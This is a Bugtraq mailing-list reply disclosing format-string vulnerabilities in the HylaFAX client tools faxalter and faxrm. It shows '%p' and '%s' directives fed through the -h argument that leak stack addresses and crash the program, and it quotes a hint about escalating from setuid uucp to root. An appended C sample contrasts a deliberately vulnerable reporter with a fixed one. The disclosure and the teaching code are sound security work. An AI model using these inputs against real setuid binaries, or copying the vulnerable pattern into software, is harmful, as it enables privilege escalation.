[22727] in bugtraq


Re: hylafax

daemon@ATHENA.MIT.EDU (KF)
Tue Sep 25 01:37:12 2001

Message-ID: <39B3633B.2AB6F94F@snosoft.com>
Date: Mon, 04 Sep 2000 04:54:19 -0400
From: KF <dotslash@snosoft.com>
MIME-Version: 1.0
To: christer.oberg@gmx.net
Cc: bugtraq@securityfocus.com
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit

Same deal on Mandrake 8.0...

hylafax-client-4.1-5mdk.i586.rpm 

[root@linux /root]# cat /etc/redhat-release
Linux Mandrake release 8.0 (Traktopel) for i586

[root@linux /root]# ls -al /usr/bin/faxalter
-rwxr-xr-x    1 root     root        13380 Aug  6  2001 /usr/bin/faxalter*

[root@linux /root]# /usr/bin/faxalter -h %p,%p,%p,%p,%p,%p,%p -D 1
0x804a153,0x401b3290,0x1,0x8048364,0xbffff25c,(nil),0x40015b94: Unknown host

[root@linux elguapo]# /usr/bin/faxalter -h %s,%s,%s -D 1
Segmentation fault (core dumped)
[root@linux elguapo]# gdb  /usr/bin/faxalter core

(gdb) bt
#0  0x40209ab7 in vfprintf () from /lib/libc.so.6
#1  0x4020d0f0 in vfprintf () from /lib/libc.so.6
#2  0x40207d7b in vfprintf () from /lib/libc.so.6
#3  0x40066509 in FaxClient::vprintError () from /usr/lib/libfaxutil.so.4.0.1

-KF 

> 
> There are some format string vulnerabilities in the latest hylafax package
> try faxrm -h %x 1 or faxalter -h %x -D 1 for "proof of concept".
> Both faxrm and faxalter are installed setuid uucp on FreeBSD (installed from
> port collection). uid uucp is not that exciting but with some luck you'll
> find uucp owned binaries running from cron with uid 0.
> 
> --
> Sent through GMX FreeMail - http://www.gmx.net
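
Added example (not part of the original messages, and not HylaFAX source): the bug class behind the output above, next to the fix. It assumes the -h host string ends up inside the format passed to a printf-style error reporter, which is consistent with the "...: Unknown host" output and the vprintError/vfprintf backtrace; report_error, unknown_host_vulnerable and unknown_host_fixed are hypothetical names.

```c
#include <stdarg.h>
#include <stdio.h>
#include <string.h>

/* Hypothetical stand-in for a printf-style error reporter such as the
 * vprintError frame in the backtrace. It formats into `out` instead of
 * stderr so the result can be inspected. */
static int report_error(char *out, size_t n, const char *fmt, ...)
{
    va_list ap;
    va_start(ap, fmt);
    int len = vsnprintf(out, n, fmt, ap);
    va_end(ap);
    return len;
}

/* Vulnerable pattern (assumed): the host name is pasted into the string
 * that is then used as the format, so any '%' in it is a directive. */
int unknown_host_vulnerable(char *out, size_t n, const char *host)
{
    char msg[256];
    snprintf(msg, sizeof msg, "%s: Unknown host", host);
    return report_error(out, n, msg);
}

/* Hardened: the format is a constant; the host is only ever an argument.
 * Declaring the reporter with __attribute__((format(printf, 3, 4))) lets
 * gcc -Wformat -Wformat-security flag the vulnerable call at build time. */
int unknown_host_fixed(char *out, size_t n, const char *host)
{
    return report_error(out, n, "%s: Unknown host", host);
}

int main(void)
{
    /* Constructed input. "%%" is the one directive that consumes no
     * argument, so the difference shows up without undefined behaviour. */
    const char *host = "fax%%srv";
    char a[128], b[128];
    unknown_host_vulnerable(a, sizeof a, host);
    unknown_host_fixed(b, sizeof b, host);
    printf("vulnerable: %s\nfixed:      %s\n", a, b);
    return 0;
}
```

The vulnerable path rewrites the host text because it was parsed as a format; the fixed path reproduces it byte for byte.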
